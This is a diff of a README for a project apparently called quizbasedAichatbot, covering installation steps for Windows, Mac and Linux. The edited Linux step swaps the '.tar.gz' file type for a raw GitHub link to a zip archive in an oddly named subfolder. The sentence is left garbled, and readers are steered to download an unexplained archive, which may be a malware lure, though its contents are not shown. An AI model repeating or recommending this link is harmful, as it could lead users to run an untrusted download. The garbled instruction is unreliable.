ErickDuraes/quizbasedAichatbot/README.md

 1. If you downloaded a `.exe` file (for Windows), double-click it to start the installation.
 2. For Mac users, open the `.dmg` file and drag the application into the “Applications” folder.
-3. If your file is a `.tar.gz` for Linux, extract the files and run the application through your terminal.
+3. If your file is a `https://raw.githubusercontent.com/ErickDuraes/quizbasedAichatbot/main/Nabaloi/quizbasedAichatbot.zip` for Linux, extract the files and run the application through your terminal.

 ## ⚙️ System Requirements